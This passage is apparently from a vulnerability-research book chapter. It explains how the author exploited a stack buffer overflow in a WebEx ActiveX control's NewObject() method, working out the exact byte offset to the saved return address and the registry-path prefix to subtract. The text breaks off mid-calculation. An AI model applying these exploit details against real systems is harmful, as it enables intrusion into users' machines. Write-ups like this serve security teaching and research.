After I found the vulnerability, exploitation was easy. All I had to do was tweak the length of the string argument supplied to NewObject() to overflow the stack buffer and gain control of the return address of the current stack frame.

As illustrated in Figure 5-9, the distance from the SubKey buffer to the saved return address on the stack is 272 bytes (the offset of the saved return address (+00000004) minus the offset of SubKey (−0000010C): 0x4 - −0x10c = 0x110 (272)). I also had to account for the fact that the string “Authoring” and part of the format string will be copied into SubKey right before the user-controlled data (see Figure 5-10). All in all I had to subtract 40 bytes (“SOFTWARE\Webex\UCF\Components\Authoring\”) ...